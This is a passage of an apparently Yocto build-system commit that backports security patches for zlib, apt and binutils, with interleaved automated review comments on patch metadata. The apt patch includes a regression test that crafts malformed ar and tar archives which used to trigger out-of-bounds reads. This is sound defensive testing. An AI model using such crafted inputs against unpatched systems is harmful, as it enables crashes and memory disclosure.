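++ s->sym_buf = s->pending_buf + s->lit_bufsize;
++ s->sym_end = (s->lit_bufsize - 1) * 3;
++ /* We avoid equality with lit_bufsize*3 because of wraparound at 64K
++ * on 16 bit machines and because stored blocks are restricted to
++ * 64K-1 bytes.
++ */
+
+ s->level = level;
+ s->strategy = strategy;
+@@ -552,7 +589,7 @@ int ZEXPORT deflatePrime (strm, bits, value)
+
+ if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
+ s = strm->state;
+- if ((Bytef *)(s->d_buf) < s->pending_out + ((Buf_size + 7) >> 3))
++ if (s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3))
+ return Z_BUF_ERROR;
+ do {
+ put = Buf_size - s->bi_valid;
+@@ -1113,7 +1150,6 @@ int ZEXPORT deflateCopy (dest, source)
+ #else
+ deflate_state *ds;
+ deflate_state *ss;
+- ushf *overlay;
+
+
+ if (deflateStateCheck(source) || dest == Z_NULL) {
+@@ -1133,8 +1169,7 @@ int ZEXPORT deflateCopy (dest, source)
+ ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte));
+ ds->prev = (Posf *) ZALLOC(dest, ds->w_size, sizeof(Pos));
+ ds->head = (Posf *) ZALLOC(dest, ds->hash_size, sizeof(Pos));
+- overlay = (ushf *) ZALLOC(dest, ds->lit_bufsize, sizeof(ush)+2);
+- ds->pending_buf = (uchf *) overlay;
++ ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4);
+
+ if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL ||
+ ds->pending_buf == Z_NULL) {
+@@ -1148,8 +1183,7 @@ int ZEXPORT deflateCopy (dest, source)
+ zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size);
+
+ ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf);
+- ds->d_buf = overlay + ds->lit_bufsize/sizeof(ush);
+- ds->l_buf = ds->pending_buf + (1+sizeof(ush))*ds->lit_bufsize;
++ ds->sym_buf = ds->pending_buf + ds->lit_bufsize;
+
+ ds->l_desc.dyn_tree = ds->dyn_ltree;
+ ds->d_desc.dyn_tree = ds->dyn_dtree;
+@@ -1925,7 +1959,7 @@ local block_state deflate_fast(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2056,7 +2090,7 @@ local block_state deflate_slow(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2131,7 +2165,7 @@ local block_state deflate_rle(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2170,7 +2204,7 @@ local block_state deflate_huff(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+diff --git a/deflate.h b/deflate.h
+index 23ecdd312..d4cf1a98b 100644
+--- a/deflate.h
++++ b/deflate.h
+@@ -217,7 +217,7 @@ typedef struct internal_state {
+ /* Depth of each subtree used as tie breaker for trees of equal frequency
+ */
+
+- uchf *l_buf; /* buffer for literals or lengths */
++ uchf *sym_buf; /* buffer for distances and literals/lengths */
+
+ uInt lit_bufsize;
+ /* Size of match buffer for literals/lengths. There are 4 reasons for
+@@ -239,13 +239,8 @@ typedef struct internal_state {
+ * - I can't count above 4
+ */
+
+- uInt last_lit; /* running index in l_buf */
+-
+- ushf *d_buf;
+- /* Buffer for distances. To simplify the code, d_buf and l_buf have
+- * the same number of elements. To use different lengths, an extra flag
+- * array would be necessary.
+- */
++ uInt sym_next; /* running index in sym_buf */
++ uInt sym_end; /* symbol table full when sym_next reaches this */
+
+ ulg opt_len; /* bit length of current block with optimal trees */
+ ulg static_len; /* bit length of current block with static trees */
+@@ -325,20 +320,22 @@ void ZLIB_INTERNAL _tr_stored_block OF((deflate_state *s, charf *buf,
+
+ # define _tr_tally_lit(s, c, flush) \
+ { uch cc = (c); \
+- s->d_buf[s->last_lit] = 0; \
+- s->l_buf[s->last_lit++] = cc; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = cc; \
+ s->dyn_ltree[cc].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ # define _tr_tally_dist(s, distance, length, flush) \
+ { uch len = (uch)(length); \
+ ush dist = (ush)(distance); \
+- s->d_buf[s->last_lit] = dist; \
+- s->l_buf[s->last_lit++] = len; \
++ s->sym_buf[s->sym_next++] = dist; \
++ s->sym_buf[s->sym_next++] = dist >> 8; \
++ s->sym_buf[s->sym_next++] = len; \
+ dist--; \
+ s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \
+ s->dyn_dtree[d_code(dist)].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ #else
+ # define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c)
+diff --git a/trees.c b/trees.c
+index 4f4a65011..decaeb7c3 100644
+--- a/trees.c
++++ b/trees.c
+@@ -416,7 +416,7 @@ local void init_block(s)
+
+ s->dyn_ltree[END_BLOCK].Freq = 1;
+ s->opt_len = s->static_len = 0L;
+- s->last_lit = s->matches = 0;
++ s->sym_next = s->matches = 0;
+ }
+
+ #define SMALLEST 1
+@@ -948,7 +948,7 @@ void ZLIB_INTERNAL _tr_flush_block(s, buf, stored_len, last)
+
+ Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ",
+ opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len,
+- s->last_lit));
++ s->sym_next / 3));
+
+ if (static_lenb <= opt_lenb) opt_lenb = static_lenb;
+
+@@ -1017,8 +1017,9 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ unsigned dist; /* distance of matched string */
+ unsigned lc; /* match length-MIN_MATCH or unmatched char (if dist==0) */
+ {
+- s->d_buf[s->last_lit] = (ush)dist;
+- s->l_buf[s->last_lit++] = (uch)lc;
++ s->sym_buf[s->sym_next++] = dist;
++ s->sym_buf[s->sym_next++] = dist >> 8;
++ s->sym_buf[s->sym_next++] = lc;
+ if (dist == 0) {
+ /* lc is the unmatched char */
+ s->dyn_ltree[lc].Freq++;
+@@ -1033,30 +1034,7 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ s->dyn_ltree[_length_code[lc]+LITERALS+1].Freq++;
+ s->dyn_dtree[d_code(dist)].Freq++;
+ }
+-
+-#ifdef TRUNCATE_BLOCK
+- /* Try to guess if it is profitable to stop the current block here */
+- if ((s->last_lit & 0x1fff) == 0 && s->level > 2) {
+- /* Compute an upper bound for the compressed length */
+- ulg out_length = (ulg)s->last_lit*8L;
+- ulg in_length = (ulg)((long)s->strstart - s->block_start);
+- int dcode;
+- for (dcode = 0; dcode < D_CODES; dcode++) {
+- out_length += (ulg)s->dyn_dtree[dcode].Freq *
+- (5L+extra_dbits[dcode]);
+- }
+- out_length >>= 3;
+- Tracev((stderr,"\nlast_lit %u, in %ld, out ~%ld(%ld%%) ",
+- s->last_lit, in_length, out_length,
+- 100L - out_length*100L/in_length));
+- if (s->matches < s->last_lit/2 && out_length < in_length/2) return 1;
+- }
+-#endif
+- return (s->last_lit == s->lit_bufsize-1);
+- /* We avoid equality with lit_bufsize because of wraparound at 64K
+- * on 16 bit machines and because stored blocks are restricted to
+- * 64K-1 bytes.
+- */
++ return (s->sym_next == s->sym_end);
+ }
+
+ /* ===========================================================================
+@@ -1069,13 +1047,14 @@ local void compress_block(s, ltree, dtree)
+ {
+ unsigned dist; /* distance of matched string */
+ int lc; /* match length or unmatched char (if dist == 0) */
+- unsigned lx = 0; /* running index in l_buf */
++ unsigned sx = 0; /* running index in sym_buf */
+ unsigned code; /* the code to send */
+ int extra; /* number of extra bits to send */
+
+- if (s->last_lit != 0) do {
+- dist = s->d_buf[lx];
+- lc = s->l_buf[lx++];
++ if (s->sym_next != 0) do {
++ dist = s->sym_buf[sx++] & 0xff;
++ dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8;
++ lc = s->sym_buf[sx++];
+ if (dist == 0) {
+ send_code(s, lc, ltree); /* send a literal byte */
+ Tracecv(isgraph(lc), (stderr," '%c' ", lc));
+@@ -1100,11 +1079,10 @@ local void compress_block(s, ltree, dtree)
+ }
+ } /* literal or match pair ? */
+
+- /* Check that the overlay between pending_buf and d_buf+l_buf is ok: */
+- Assert((uInt)(s->pending) < s->lit_bufsize + 2*lx,
+- "pendingBuf overflow");
++ /* Check that the overlay between pending_buf and sym_buf is ok: */
++ Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow");
+
+- } while (lx < s->last_lit);
++ } while (sx < s->sym_next);
+
+ send_code(s, END_BLOCK, ltree);
+ }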
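Review bot: The header of this backport gives `Upstream-Status: Backport` with no reference, so the provenance of a 347-line security patch rests on the `From 5c44459c…` line alone, while CVE-2022-37434.patch and CVE-2023-45853.patch in this same commit name their upstream commits. I would write `Upstream-Status: Backport [https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531]` so the change can be compared against upstream when it is audited or rebased. The three OE tags also sit above the `From` line here, whereas CVE-2023-45853.patch places them inside the commit message; keeping one layout across the zlib patches makes them easier to check.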
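--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
@@ -0,0 +1,44 @@
+From 8617d83d6939754ae3a04fc2d22daa18eeea2a43 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 17 Aug 2022 10:15:57 +0530
+Subject: [PATCH] CVE-2022-37434
+
+Upstream-Status: Backport [https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1 & https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d]
+CVE: CVE-2022-37434
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Fix a bug when getting a gzip header extra field with inflate().
+
+If the extra field was larger than the space the user provided with
+inflateGetHeader(), and if multiple calls of inflate() delivered
+the extra header data, then there could be a buffer overflow of the
+provided space. This commit assures that provided space is not
+exceeded.
+
+ Fix extra field processing bug that dereferences NULL state->head.
+
+The recent commit to fix a gzip header extra field processing bug
+introduced the new bug fixed here.
+---
+ inflate.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/inflate.c b/inflate.c
+index ac333e8..cd01857 100644
+--- a/inflate.c
++++ b/inflate.c
+@@ -759,8 +759,9 @@ int flush;
+ if (copy > have) copy = have;
+ if (copy) {
+ if (state->head != Z_NULL &&
+- state->head->extra != Z_NULL) {
+- len = state->head->extra_len - state->length;
++ state->head->extra != Z_NULL &&
++ (len = state->head->extra_len - state->length) <
++ state->head->extra_max) {
+ zmemcpy(state->head->extra + len, next,
+ len + copy > state->head->extra_max ?
+ state->head->extra_max - len : copy);
+--
+2.25.1
+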
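--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
@@ -0,0 +1,40 @@
+From 73331a6a0481067628f065ffe87bb1d8f787d10c Mon Sep 17 00:00:00 2001
+From: Hans Wennborg <hans@chromium.org>
+Date: Fri, 18 Aug 2023 11:05:33 +0200
+Subject: [PATCH] Reject overflows of zip header fields in minizip.
+
+This checks the lengths of the file name, extra field, and comment
+that would be put in the zip headers, and rejects them if they are
+too long. They are each limited to 65535 bytes in length by the zip
+format. This also avoids possible buffer overflows if the provided
+fields are too long.
+
+Upstream-Status: Backport from [https://github.com/madler/zlib/commit/73331a6a0481067628f065ffe87bb1d8f787d10c]
+CVE: CVE-2023-45853
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ contrib/minizip/zip.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/contrib/minizip/zip.c b/contrib/minizip/zip.c
+index 3d3d4cadd..0446109b2 100644
+--- a/contrib/minizip/zip.c
++++ b/contrib/minizip/zip.c
+@@ -1043,6 +1043,17 @@ extern int ZEXPORT zipOpenNewFileInZip4_64(zipFile file, const char* filename, c
+ return ZIP_PARAMERROR;
+ #endif
+
++ // The filename and comment length must fit in 16 bits.
++ if ((filename!=NULL) && (strlen(filename)>0xffff))
++ return ZIP_PARAMERROR;
++ if ((comment!=NULL) && (strlen(comment)>0xffff))
++ return ZIP_PARAMERROR;
++ // The extra field length must fit in 16 bits. If the member also requires
++ // a Zip64 extra block, that will also need to fit within that 16-bit
++ // length, but that will be checked for later.
++ if ((size_extrafield_local>0xffff) || (size_extrafield_global>0xffff))
++ return ZIP_PARAMERROR;
++
+ zi = (zip64_internal*)file;
+
+ if (zi->in_opened_file_inzip == 1)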
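--- a/meta/recipes-core/zlib/zlib_1.2.11.bb
+++ b/meta/recipes-core/zlib/zlib_1.2.11.bb
@@ -8,7 +8,10 @@ LIC_FILES_CHKSUM = "file://zlib.h;beginline=6;endline=23;md5=5377232268e952e9ef6
 
 SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/${BPN}/${PV}/${BPN}-${PV}.tar.xz \
  file://ldflags-tests.patch \
+ file://CVE-2018-25032.patch \
  file://run-ptest \
+ file://CVE-2022-37434.patch \
+ file://CVE-2023-45853.patch \
  "
 UPSTREAM_CHECK_URI = "http://zlib.net/"
 
@@ -50,3 +53,6 @@ do_install_append_class-target() {
 }
 
 BBCLASSEXTEND = "native nativesdk"
+
+# this CVE is for cloudflare zlib
+CVE_CHECK_WHITELIST += "CVE-2023-6992"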
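--- a/meta/recipes-devtools/apt/apt.inc
+++ b/meta/recipes-devtools/apt/apt.inc
@@ -2,6 +2,7 @@ SUMMARY = "Advanced front-end for dpkg"
 DESCRIPTION = "Provides command-line tools for searching and managing as well \
 as querying information about packages as a low-level access to all features \
 of the libapt-pkg library."
+HOMEPAGE = "https://packages.debian.org/jessie/apt"
 LICENSE = "GPLv2.0+"
 SECTION = "base"
 
@@ -17,6 +18,7 @@ SRC_URI = "https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/${BPN}/${P
  file://0001-environment.mak-musl-based-systems-can-generate-shar.patch \
  file://0001-apt-1.2.12-Fix-musl-build.patch \
  file://0001-Include-array.h-for-std-array.patch \
+ file://CVE-2020-3810.patch \
  "
 SRC_URI[md5sum] = "d30eed9304e82ea8238c854b5c5a34d9"
 SRC_URI[sha256sum] = "03ded4f5e9b8d43ecec083704b2dcabf20c182ed382db9ac7251da0b0b038059"
@@ -35,5 +37,9 @@ do_configure_prepend() {
  rm -rf ${S}/buildlib/config.guess
 }
 
+# there are code generation issues with some compilers in the SHA256 implementation
+# turn off strict-aliasing to avoid these issues
+CXXFLAGS:append = " -fno-strict-aliasing"
+
 USERADD_PACKAGES = "${PN}"
 USERADD_PARAM_${PN} = "--system --no-create-home --home-dir /nonexistent --shell /bin/false --user-group _apt"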
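Review bot: `CXXFLAGS:append` in the last hunk uses the colon override syntax, while the rest of this recipe uses the underscore form (`do_configure_prepend`, `USERADD_PARAM_${PN}`). On a BitBake that only applies underscore overrides, this line would presumably set an unrelated variable instead of appending to CXXFLAGS, so `-fno-strict-aliasing` would be silently missing and the SHA256 code-generation issue the comment describes would remain. That is worth ruling out because apt depends on those digests to verify what it downloads. I would write `CXXFLAGS_append = " -fno-strict-aliasing"` to match the file, and confirm with `bitbake -e apt` that the flag reaches the final CXXFLAGS.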
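--- /dev/null
+++ b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
@@ -0,0 +1,174 @@
+From dceb1e49e4b8e4dadaf056be34088b415939cda6 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Tue, 12 May 2020 11:49:09 +0200
+Subject: [PATCH] SECURITY UPDATE: Fix out of bounds read in .ar and .tar
+ implementation (CVE-2020-3810)
+
+When normalizing ar member names by removing trailing whitespace
+and slashes, an out-out-bound read can be caused if the ar member
+name consists only of such characters, because the code did not
+stop at 0, but would wrap around and continue reading from the
+stack, without any limit.
+
+Add a check to abort if we reached the first character in the
+name, effectively rejecting the use of names consisting just
+of slashes and spaces.
+
+Furthermore, certain error cases in arfile.cc and extracttar.cc have
+included member names in the output that were not checked at all and
+might hence not be nul terminated, leading to further out of bound reads.
+
+Fixes Debian/apt#111
+LP: #1878177
+
+CVE: CVE-2020-3810
+
+Upstream-Status: Backport:
+https://salsa.debian.org/apt-team/apt/-/commit/dceb1e49e4b8e4dadaf056be34088b415939cda6
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+apt-inst/contrib/arfile.cc | 11 ++-
+apt-inst/contrib/extracttar.cc | 2 +-
+.../test-github-111-invalid-armember | 88 +++++++++++++++++++
+ 3 files changed, 98 insertions(+), 3 deletions(-)
+ create mode 100755 test/integration/test-github-111-invalid-armember
+
+diff --git a/apt-inst/contrib/arfile.cc b/st/contrib/arfile.cc
+index 3fc3afedb..5cb43c690 100644
+--- a/apt-inst/contrib/arfile.cc
++++ b/apt-inst/contrib/arfile.cc
+@@ -92,7 +92,7 @@ bool ARArchive::LoadHeaders()
+ StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
+ {
+ delete Memb;
+- return _error->Error(_("Invalid archive member header %s"), Head.Name);
++ return _error->Error(_("Invalid archive member header"));
+ }
+
+ // Check for an extra long name string
+@@ -119,7 +119,14 @@ bool ARArchive::LoadHeaders()
+ else
+ {
+ unsigned int I = sizeof(Head.Name) - 1;
+- for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--);
++ for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--)
++ {
++ if (I == 0)
++ {
++ delete Memb;
++ return _error->Error(_("Invalid archive member header"));
++ }
++ }
+ Memb->Name = std::string(Head.Name,I+1);
+ }
+
+diff --git a/apt-inst/contrib/extracttar.cc b/apt-inst/contrib/extracttar.cc
+index 9bb0a55c0..b22f59dbc 100644
+--- a/apt-inst/contrib/extracttar.cc
++++ b/apt-inst/contrib/extracttar.cc
+@@ -254,7 +254,7 @@ bool ExtractTar::Go(pkgDirStream &Stream)
+
+ default:
+ BadRecord = true;
+- _error->Warning(_("Unknown TAR header type %u, member %s"),(unsigned)Tar->LinkFlag,Tar->Name);
++ _error->Warning(_("Unknown TAR header type %u"), (unsigned)Tar->LinkFlag);
+ break;
+ }
+
+diff --git a/test/integration/test-github-111-invalid-armember b/test/integration/test-github-111-invalid-armember
+new file mode 100755
+index 000000000..ec2163bf6
+--- /dev/null
++++ b/test/integration/test-github-111-invalid-armember
+@@ -0,0 +1,88 @@
++#!/bin/sh
++set -e
++
++TESTDIR="$(readlink -f "$(dirname "$0")")"
++. "$TESTDIR/framework"
++setupenvironment
++configarchitecture "amd64"
++setupaptarchive
++
++# this used to crash, but it should treat it as an invalid member header
++touch ' '
++ar -q test.deb ' '
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++rm test.deb
++touch 'x'
++ar -q test.deb 'x'
++testsuccessequal "E: This is not a valid DEB archive, missing 'debian-binary' member" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# <name><size> [ other fields] - name is not nul terminated here, it ends in .
++msgmsg "Unterminated ar member name"
++printf '!<arch>\0120123456789ABCDE.A123456789A.01234.01234.0123456.012345678.0.' > test.deb
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# unused source code for generating $tar below
++maketar() {
++ cat > maketar.c << EOF
++ #include <stdio.h>
++ #include <string.h>
++ struct tar {
++ char Name[100];
++ char Mode[8];
++ char UserID[8];
++ char GroupID[8];
++ char Size[12];
++ char MTime[12];
++ char Checksum[8];
++ char LinkFlag;
++ char LinkName[100];
++ char MagicNumber[8];
++ char UserName[32];
++ char GroupName[32];
++ char Major[8];
++ char Minor[8];
++ };
++
++ int main(void)
++ {
++ union {
++ struct tar t;
++ char buf[512];
++ } t;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ t.buf[i] = '7';
++ memcpy(t.t.Name, "unterminatedName", 16);
++ memcpy(t.t.UserName, "userName", 8);
++ memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);
++ t.t.LinkFlag = 'X'; // I AM BROKEN
++ memcpy(t.t.Size, "000000000000", sizeof(t.t.Size));
++ memset(t.t.Checksum,' ',sizeof(t.t.Checksum));
++
++ unsigned long sum = 0;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ sum += t.buf[i];
++
++ int written = sprintf(t.t.Checksum, "%lo", sum);
++ for (int i = written; i < sizeof(t.t.Checksum); i++)
++ t.t.Checksum[i] = ' ';
++ fwrite(t.buf, sizeof(t.buf), 1, stdout);
++ }
++EOF
++
++ gcc maketar.c -o maketar -Wall
++ ./maketar
++}
++
++
++#
++tar="unterminatedName77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777700000000000077777777777773544 X777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777userName777777777777777777777777thisIsAGroupNamethisIsAGroupName777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777"
++printf '%s' "$tar" | gzip > control.tar.gz
++cp control.tar.gz data.tar.gz
++touch debian-binary
++rm test.deb
++ar -q test.deb debian-binary control.tar.gz data.tar.gz
++testsuccessequal "W: Unknown TAR header type 88" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
+--
+GitLab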
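Review bot: The tag `Upstream-Status: Backport:` is followed by the URL on a line of its own, which does not match the `Backport [URL]` form used by CVE-2022-37434.patch in this commit and may not be recognised by patch-status checks; I would write `Upstream-Status: Backport [https://salsa.debian.org/apt-team/apt/-/commit/dceb1e49e4b8e4dadaf056be34088b415939cda6]`. The first file header reads `diff --git a/apt-inst/contrib/arfile.cc b/st/contrib/arfile.cc` and the diffstat lines have lost their leading space, which suggests the patch was edited by hand after export. The `---`/`+++` lines are intact, so it should still apply, but regenerating the file from the upstream commit would remove any doubt about what was changed. The added script under test/integration is presumably not run by the recipe, so the bounds check in `ARArchive::LoadHeaders` has no regression coverage in this build.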
diff --git a/meta/recipes-devtools/binutils/binutils-2.34.inc b/meta/recipes-devtools/binutils/binutils-2.34.inc
index f557fe970c..032263fe63 100644
--- a/meta/recipes-devtools/binutils/binutils-2.34.inc
+++ b/meta/recipes-devtools/binutils/binutils-2.34.inc
@@ -24,7 +24,7 @@ BRANCH ?= "binutils-2_34-branch"
24 24
25UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)" 25UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)"
26 26
27SRCREV ?= "d4b50999b3b287b5f984ade2f8734aa8c9359440" 27SRCREV ?= "c4e78c0868a22971680217a41fdb73516a26813d"
28BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git" 28BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git"
29SRC_URI = "\ 29SRC_URI = "\
30 ${BINUTILS_GIT_URI} \ 30 ${BINUTILS_GIT_URI} \
@@ -42,9 +42,25 @@ SRC_URI = "\
42 file://0015-sync-with-OE-libtool-changes.patch \ 42 file://0015-sync-with-OE-libtool-changes.patch \
43 file://0016-Check-for-clang-before-checking-gcc-version.patch \ 43 file://0016-Check-for-clang-before-checking-gcc-version.patch \
44 file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \ 44 file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \
45 file://0018-Include-members-in-the-variable-table-used-when-reso.patch \
45 file://CVE-2020-0551.patch \ 46 file://CVE-2020-0551.patch \
46 file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \ 47 file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \
47 file://CVE-2020-16592.patch \ 48 file://CVE-2020-16592.patch \
48 file://CVE-2020-16598.patch \ 49 file://CVE-2020-16598.patch \
50 file://CVE-2021-20197.patch \
51 file://CVE-2021-3487.patch \
52 file://CVE-2021-3549.patch \
53 file://CVE-2020-16593.patch \
54 file://0001-CVE-2021-45078.patch \
55 file://CVE-2022-38533.patch \
56 file://CVE-2023-25588.patch \
57 file://CVE-2021-46174.patch \
58 file://CVE-2023-25584.patch \
59 file://CVE-2022-47007.patch \
60 file://CVE-2022-47008.patch \
61 file://CVE-2022-47010.patch \
62 file://CVE-2022-47011.patch \
63 file://CVE-2022-48063.patch \
64 file://CVE-2022-47695.patch \
49" 65"
50S = "${WORKDIR}/git" 66S = "${WORKDIR}/git"
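diff --git a/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
new file mode 100644
index 0000000000..2af82477ac
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
@@ -0,0 +1,257 @@
+From 161e87d12167b1e36193385485c1f6ce92f74f02 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Dec 2021 11:48:42 +1030
+Subject: [PATCH] PR28694, Out-of-bounds write in stab_xcoff_builtin_type
+
+ PR 28694
+ * stabs.c (stab_xcoff_builtin_type): Make typenum unsigned.
+ Negate typenum earlier, simplifying bounds checking. Correct
+ off-by-one indexing. Adjust switch cases.
+
+
+CVE: CVE-2021-45078
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=161e87d12167b1e36193385485c1f6ce92f74f02]
+
+Signed-off-by: Sundeep KOKKONDA <sundeep.kokkonda@gmail.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ binutils/stabs.c | 87 ++++++++++++++++++++++++------------------------
+ 1 file changed, 43 insertions(+), 44 deletions(-)
+
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 274bfb0e7fa..83ee3ea5fa4 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -202,7 +202,7 @@ static debug_type stab_find_type (void *, struct stab_handle *, const int *);
+ static bfd_boolean stab_record_type
+ (void *, struct stab_handle *, const int *, debug_type);
+ static debug_type stab_xcoff_builtin_type
+- (void *, struct stab_handle *, int);
++ (void *, struct stab_handle *, unsigned int);
+ static debug_type stab_find_tagged_type
+ (void *, struct stab_handle *, const char *, int, enum debug_type_kind);
+ static debug_type *stab_demangle_argtypes
+@@ -3496,166 +3496,167 @@ stab_record_type (void *dhandle ATTRIBUTE_UNUSED, struct stab_handle *info,
+
+ static debug_type
+ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+- int typenum)
++ unsigned int typenum)
+ {
+ debug_type rettype;
+ const char *name;
+
+- if (typenum >= 0 || typenum < -XCOFF_TYPE_COUNT)
++ typenum = -typenum - 1;
++ if (typenum >= XCOFF_TYPE_COUNT)
+ {
+- fprintf (stderr, _("Unrecognized XCOFF type %d\n"), typenum);
++ fprintf (stderr, _("Unrecognized XCOFF type %d\n"), -typenum - 1);
+ return DEBUG_TYPE_NULL;
+ }
+- if (info->xcoff_types[-typenum] != NULL)
+- return info->xcoff_types[-typenum];
++ if (info->xcoff_types[typenum] != NULL)
++ return info->xcoff_types[typenum];
+
+- switch (-typenum)
++ switch (typenum)
+ {
+- case 1:
++ case 0:
+ /* The size of this and all the other types are fixed, defined
+ by the debugging format. */
+ name = "int";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 2:
++ case 1:
+ name = "char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 3:
++ case 2:
+ name = "short";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 4:
++ case 3:
+ name = "long";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 5:
++ case 4:
+ name = "unsigned char";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 6:
++ case 5:
+ name = "signed char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 7:
++ case 6:
+ name = "unsigned short";
+ rettype = debug_make_int_type (dhandle, 2, TRUE);
+ break;
+- case 8:
++ case 7:
+ name = "unsigned int";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 9:
++ case 8:
+ name = "unsigned";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 10:
++ case 9:
+ name = "unsigned long";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 11:
++ case 10:
+ name = "void";
+ rettype = debug_make_void_type (dhandle);
+ break;
+- case 12:
++ case 11:
+ /* IEEE single precision (32 bit). */
+ name = "float";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 13:
++ case 12:
+ /* IEEE double precision (64 bit). */
+ name = "double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 14:
++ case 13:
+ /* This is an IEEE double on the RS/6000, and different machines
+ with different sizes for "long double" should use different
+ negative type numbers. See stabs.texinfo. */
+ name = "long double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 15:
++ case 14:
+ name = "integer";
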